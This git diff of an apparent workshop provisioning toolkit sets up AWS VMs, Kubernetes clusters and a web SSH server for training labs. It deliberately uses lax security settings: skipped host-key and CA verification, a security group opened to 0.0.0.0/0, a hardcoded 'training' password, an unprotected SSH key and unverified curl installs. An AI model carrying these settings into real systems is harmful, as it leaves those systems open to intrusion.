| sudo tar --strip-components=3 -zx kubernetes/server/bin/hyperkube
|
||||
fi
|
||||
if ! [ -x kubelet ]; then
|
||||
for BINARY in kubectl kube-apiserver kube-scheduler kube-controller-manager kubelet kube-proxy;
|
||||
do
|
||||
sudo ln -s hyperkube \$BINARY
|
||||
done
|
||||
fi
|
||||
sudo mkdir -p /opt/cni/bin
|
||||
cd /opt/cni/bin
|
||||
if ! [ -x bridge ]; then
|
||||
curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.5/cni-plugins-amd64-v0.7.5.tgz \
|
||||
| sudo tar -zx
|
||||
fi
|
||||
"
|
||||
}
|
||||
|
||||
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
|
||||
_cmd_kube() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# Optional version, e.g. 1.13.5
|
||||
KUBEVERSION=$2
|
||||
if [ "$KUBEVERSION" ]; then
|
||||
EXTRA_KUBELET="=$KUBEVERSION-00"
|
||||
EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
|
||||
else
|
||||
EXTRA_KUBELET=""
|
||||
EXTRA_KUBEADM=""
|
||||
fi
|
||||
|
||||
# Install packages
|
||||
pssh --timeout 200 "
|
||||
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
|
||||
@@ -116,19 +167,19 @@ _cmd_kube() {
|
||||
sudo tee /etc/apt/sources.list.d/kubernetes.list"
|
||||
pssh --timeout 200 "
|
||||
sudo apt-get update -q &&
|
||||
sudo apt-get install -qy kubelet kubeadm kubectl &&
|
||||
sudo apt-get install -qy kubelet$EXTRA_KUBELET kubeadm kubectl &&
|
||||
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
|
||||
|
||||
# Initialize kube master
|
||||
pssh --timeout 200 "
|
||||
if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
|
||||
if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
|
||||
kubeadm token generate > /tmp/token &&
|
||||
sudo kubeadm init --token \$(cat /tmp/token)
|
||||
sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
|
||||
fi"
|
||||
|
||||
# Put kubeconfig in ubuntu's and docker's accounts
|
||||
pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
if i_am_first_node; then
|
||||
sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
|
||||
sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
|
||||
sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
|
||||
@@ -138,16 +189,23 @@ _cmd_kube() {
|
||||
|
||||
# Install weave as the pod network
|
||||
pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
if i_am_first_node; then
|
||||
kubever=\$(kubectl version | base64 | tr -d '\n') &&
|
||||
kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
|
||||
fi"
|
||||
|
||||
# Join the other nodes to the cluster
|
||||
pssh --timeout 200 "
|
||||
if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
|
||||
TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token) &&
|
||||
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
|
||||
if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
|
||||
FIRSTNODE=\$(cat /etc/name_of_first_node) &&
|
||||
TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
|
||||
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
|
||||
fi"
|
||||
|
||||
# Install metrics server
|
||||
pssh "
|
||||
if i_am_first_node; then
|
||||
kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
|
||||
fi"
|
||||
|
||||
# Install kubectx and kubens
|
||||
@@ -171,7 +229,7 @@ EOF"
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/stern ]; then
|
||||
##VERSION##
|
||||
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.10.0/stern_linux_amd64 &&
|
||||
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
|
||||
sudo chmod +x /usr/local/bin/stern &&
|
||||
stern --completion bash | sudo tee /etc/bash_completion.d/stern
|
||||
fi"
|
||||
@@ -183,6 +241,21 @@ EOF"
|
||||
helm completion bash | sudo tee /etc/bash_completion.d/helm
|
||||
fi"
|
||||
|
||||
# Install ship
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/ship ]; then
|
||||
curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
|
||||
sudo tar -C /usr/local/bin -zx ship
|
||||
fi"
|
||||
|
||||
# Install the AWS IAM authenticator
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
|
||||
##VERSION##
|
||||
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
|
||||
sudo chmod +x /usr/local/bin/aws-iam-authenticator
|
||||
fi"
|
||||
|
||||
sep "Done"
|
||||
}
|
||||
|
||||
@@ -203,10 +276,9 @@ _cmd_kubetest() {
|
||||
# Feel free to make that better ♥
|
||||
pssh "
|
||||
set -e
|
||||
[ -f /tmp/node ]
|
||||
if grep -q node1 /tmp/node; then
|
||||
if i_am_first_node; then
|
||||
which kubectl
|
||||
for NODE in \$(awk /\ node/\ {print\ \\\$2} /etc/hosts); do
|
||||
for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
|
||||
echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
|
||||
done
|
||||
fi"
|
||||
@@ -246,6 +318,14 @@ _cmd_listall() {
|
||||
done
|
||||
}
|
||||
|
||||
_cmd ping "Ping VMs in a given tag, to check that they have network access"
|
||||
_cmd_ping() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
fping < tags/$TAG/ips.txt
|
||||
}
|
||||
|
||||
_cmd netfix "Disable GRO and run a pinger job on the VMs"
|
||||
_cmd_netfix () {
|
||||
TAG=$1
|
||||
@@ -277,6 +357,14 @@ _cmd_opensg() {
|
||||
infra_opensg
|
||||
}
|
||||
|
||||
_cmd disableaddrchecks "Disable source/destination IP address checks"
|
||||
_cmd_disableaddrchecks() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
infra_disableaddrchecks
|
||||
}
|
||||
|
||||
_cmd pssh "Run an arbitrary command on all nodes"
|
||||
_cmd_pssh() {
|
||||
TAG=$1
|
||||
@@ -311,6 +399,15 @@ _cmd_retag() {
|
||||
aws_tag_instances $OLDTAG $NEWTAG
|
||||
}
|
||||
|
||||
_cmd ssh "Open an SSH session to the first node of a tag"
|
||||
_cmd_ssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
IP=$(head -1 tags/$TAG/ips.txt)
|
||||
info "Logging into $IP"
|
||||
ssh docker@$IP
|
||||
}
|
||||
|
||||
_cmd start "Start a group of VMs"
|
||||
_cmd_start() {
|
||||
while [ ! -z "$*" ]; do
|
||||
@@ -322,7 +419,7 @@ _cmd_start() {
|
||||
*) die "Unrecognized parameter: $1."
|
||||
esac
|
||||
done
|
||||
|
||||
|
||||
if [ -z "$INFRA" ]; then
|
||||
die "Please add --infra flag to specify which infrastructure file to use."
|
||||
fi
|
||||
@@ -333,8 +430,8 @@ _cmd_start() {
|
||||
COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
|
||||
warning "No --count option was specified. Using value from settings file ($COUNT)."
|
||||
fi
|
||||
|
||||
# Check that the specified settings and infrastructure are valid.
|
||||
|
||||
# Check that the specified settings and infrastructure are valid.
|
||||
need_settings $SETTINGS
|
||||
need_infra $INFRA
|
||||
|
||||
@@ -406,15 +503,15 @@ _cmd_helmprom() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
if i_am_first_node; then
|
||||
kubectl -n kube-system get serviceaccount helm ||
|
||||
kubectl -n kube-system create serviceaccount helm
|
||||
helm init --service-account helm
|
||||
sudo -u docker -H helm init --service-account helm
|
||||
kubectl get clusterrolebinding helm-can-do-everything ||
|
||||
kubectl create clusterrolebinding helm-can-do-everything \
|
||||
--clusterrole=cluster-admin \
|
||||
--serviceaccount=kube-system:helm
|
||||
helm upgrade --install prometheus stable/prometheus \
|
||||
sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
|
||||
--namespace kube-system \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.service.nodePort=30090 \
|
||||
@@ -439,6 +536,38 @@ _cmd_weavetest() {
|
||||
sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
|
||||
}
|
||||
|
||||
_cmd webssh "Install a WEB SSH server on the machines (port 1080)"
|
||||
_cmd_webssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pssh "
|
||||
sudo apt-get update &&
|
||||
sudo apt-get install python-tornado python-paramiko -y"
|
||||
pssh "
|
||||
[ -d webssh ] || git clone https://github.com/jpetazzo/webssh"
|
||||
pssh "
|
||||
for KEYFILE in /etc/ssh/*.pub; do
|
||||
read a b c < \$KEYFILE; echo localhost \$a \$b
|
||||
done > webssh/known_hosts"
|
||||
pssh "cat >webssh.service <<EOF
|
||||
[Unit]
|
||||
Description=webssh
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
||||
[Service]
|
||||
WorkingDirectory=/home/ubuntu/webssh
|
||||
ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
|
||||
User=nobody
|
||||
Group=nogroup
|
||||
Restart=always
|
||||
EOF"
|
||||
pssh "
|
||||
sudo systemctl enable \$PWD/webssh.service &&
|
||||
sudo systemctl start webssh.service"
|
||||
}
|
||||
|
||||
greet() {
|
||||
IAMUSER=$(aws iam get-user --query 'User.UserName')
|
||||
info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
|
||||
@@ -496,8 +625,8 @@ test_vm() {
|
||||
for cmd in "hostname" \
|
||||
"whoami" \
|
||||
"hostname -i" \
|
||||
"cat /tmp/node" \
|
||||
"cat /tmp/ipv4" \
|
||||
"ls -l /usr/local/bin/i_am_first_node" \
|
||||
"grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
|
||||
"cat /etc/hosts" \
|
||||
"hostnamectl status" \
|
||||
"docker version | grep Version -B1" \
|
||||
|
||||
@@ -24,3 +24,7 @@ infra_quotas() {
|
||||
infra_opensg() {
|
||||
warning "infra_opensg is unsupported on $INFRACLASS."
|
||||
}
|
||||
|
||||
infra_disableaddrchecks() {
|
||||
warning "infra_disableaddrchecks is unsupported on $INFRACLASS."
|
||||
}
|
||||
@@ -31,6 +31,7 @@ infra_start() {
|
||||
die "I could not find which AMI to use in this region. Try another region?"
|
||||
fi
|
||||
AWS_KEY_NAME=$(make_key_name)
|
||||
AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}
|
||||
|
||||
sep "Starting instances"
|
||||
info " Count: $COUNT"
|
||||
@@ -38,10 +39,11 @@ infra_start() {
|
||||
info " Token/tag: $TAG"
|
||||
info " AMI: $AMI"
|
||||
info " Key name: $AWS_KEY_NAME"
|
||||
info " Instance type: $AWS_INSTANCE_TYPE"
|
||||
result=$(aws ec2 run-instances \
|
||||
--key-name $AWS_KEY_NAME \
|
||||
--count $COUNT \
|
||||
--instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
|
||||
--instance-type $AWS_INSTANCE_TYPE \
|
||||
--client-token $TAG \
|
||||
--block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
|
||||
--image-id $AMI)
|
||||
@@ -88,8 +90,16 @@ infra_opensg() {
|
||||
--cidr 0.0.0.0/0
|
||||
}
|
||||
|
||||
infra_disableaddrchecks() {
|
||||
IDS=$(aws_get_instance_ids_by_tag $TAG)
|
||||
for ID in $IDS; do
|
||||
info "Disabling source/destination IP checks on: $ID"
|
||||
aws ec2 modify-instance-attribute --source-dest-check "{\"Value\": false}" --instance-id $ID
|
||||
done
|
||||
}
|
||||
|
||||
wait_until_tag_is_running() {
|
||||
max_retry=50
|
||||
max_retry=100
|
||||
i=0
|
||||
done_count=0
|
||||
while [[ $done_count -lt $COUNT ]]; do
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
#!/usr/bin/env python
|
||||
#!/usr/bin/env python3
|
||||
import os
|
||||
import sys
|
||||
import yaml
|
||||
|
||||
@@ -12,6 +12,7 @@ config = yaml.load(open("/tmp/settings.yaml"))
|
||||
COMPOSE_VERSION = config["compose_version"]
|
||||
MACHINE_VERSION = config["machine_version"]
|
||||
CLUSTER_SIZE = config["clustersize"]
|
||||
CLUSTER_PREFIX = config["clusterprefix"]
|
||||
ENGINE_VERSION = config["engine_version"]
|
||||
DOCKER_USER_PASSWORD = config["docker_user_password"]
|
||||
|
||||
@@ -121,7 +122,7 @@ addresses = list(l.strip() for l in sys.stdin)
|
||||
assert ipv4 in addresses
|
||||
|
||||
def makenames(addrs):
|
||||
return [ "node%s"%(i+1) for i in range(len(addrs)) ]
|
||||
return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]
|
||||
|
||||
while addresses:
|
||||
cluster = addresses[:CLUSTER_SIZE]
|
||||
@@ -135,15 +136,21 @@ while addresses:
|
||||
print(cluster)
|
||||
|
||||
mynode = cluster.index(ipv4) + 1
|
||||
system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
|
||||
system("echo node{} | sudo tee /etc/hostname".format(mynode))
|
||||
system("sudo hostname node{}".format(mynode))
|
||||
system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
|
||||
system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
|
||||
system("sudo -u docker mkdir -p /home/docker/.ssh")
|
||||
system("sudo -u docker touch /home/docker/.ssh/authorized_keys")
|
||||
|
||||
# Create a convenience file to easily check if we're the first node
|
||||
if ipv4 == cluster[0]:
|
||||
# If I'm node1 and don't have a private key, generate one (with empty passphrase)
|
||||
system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
|
||||
# On the first node, if we don't have a private key, generate one (with empty passphrase)
|
||||
system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
|
||||
else:
|
||||
system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
|
||||
# Record the IPV4 and name of the first node
|
||||
system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
|
||||
system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))
|
||||
|
||||
FINISH = time.time()
|
||||
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])
|
||||
|
||||
@@ -1,8 +1,11 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 1
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: dmuc
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: enix.html
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
@@ -18,9 +21,8 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
28
prepare-vms/settings/admin-kubenet.yaml
Normal file
@@ -0,0 +1,28 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: kubenet
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
28
prepare-vms/settings/admin-kuberouter.yaml
Normal file
@@ -0,0 +1,28 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: kuberouter
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
28
prepare-vms/settings/admin-test.yaml
Normal file
@@ -0,0 +1,28 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: test
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
@@ -1,5 +1,8 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 5
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: clusters.csv
|
||||
|
||||
@@ -3,6 +3,9 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 5
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
@@ -20,7 +23,7 @@ paper_margin: 0.2in
|
||||
engine_version: test
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.18.0
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.13.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -3,6 +3,9 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 1
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
@@ -20,7 +23,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.22.0
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.15.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -1,11 +1,14 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 4
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: jerome.html
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
paper_size: Letter
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
@@ -18,7 +21,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -3,8 +3,11 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: kube101.html
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
@@ -20,7 +23,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -3,6 +3,9 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
@@ -20,7 +23,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.22.0
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.15.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
66
prepare-vms/setup-admin-clusters.sh
Executable file
@@ -0,0 +1,66 @@
|
||||
#!/bin/sh
|
||||
set -e
|
||||
|
||||
export AWS_INSTANCE_TYPE=t3a.small
|
||||
|
||||
INFRA=infra/aws-us-west-2
|
||||
|
||||
STUDENTS=2
|
||||
|
||||
PREFIX=$(date +%Y-%m-%d-%H-%M)
|
||||
|
||||
SETTINGS=admin-dmuc
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--count $STUDENTS
|
||||
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl disabledocker $TAG
|
||||
./workshopctl kubebins $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
SETTINGS=admin-kubenet
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kubebins $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
SETTINGS=admin-kuberouter
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kubebins $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
#INFRA=infra/aws-us-west-1
|
||||
|
||||
export AWS_INSTANCE_TYPE=t3a.medium
|
||||
|
||||
SETTINGS=admin-test
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kube $TAG 1.13.5
|
||||
./workshopctl cards $TAG
|
||||
|
||||
@@ -1,29 +1,88 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "orchestration workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_swarm -%}
|
||||
|
||||
{%- set url = "http://FIXME.container.training/" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- set lang = "en" -%}
|
||||
{%- set event = "training session" -%}
|
||||
{%- set backside = False -%}
|
||||
{%- set image = "kube" -%}
|
||||
{%- set clusternumber = 100 -%}
|
||||
|
||||
{%- set image_src = {
|
||||
"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
|
||||
"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
|
||||
"kube": "https://avatars1.githubusercontent.com/u/13629408",
|
||||
"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
|
||||
}[image] -%}
|
||||
{%- if lang == "en" and clustersize == 1 -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
machine for this {{ event }}.
|
||||
You can connect to this VM with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Your machine is:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" and clustersize != 1 -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
cluster for this {{ event }}.
|
||||
You can connect to each VM with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Your machines are:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" and clustersize == 1 -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
machine pour cette formation.
|
||||
Vous pouvez vous connecter à cette machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Adresse IP:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" and clusterprefix != "node" -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information for the
|
||||
<strong>{{ clusterprefix }}</strong> environment.
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" and clustersize != 1 -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
cluster pour cette formation.
|
||||
Vous pouvez vous connecter à chaque machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Adresses IP:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" -%}
|
||||
{%- set slides_are_at -%}
|
||||
You can find the slides at:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" -%}
|
||||
{%- set slides_are_at -%}
|
||||
Le support de formation est à l'adresse suivante :
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 14px;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
@@ -37,24 +96,54 @@ table {
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
{% if backside %}
|
||||
height: 31%;
|
||||
{% endif %}
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
/*
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
*/
|
||||
/**/
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
/**/
|
||||
}
|
||||
|
||||
p {
|
||||
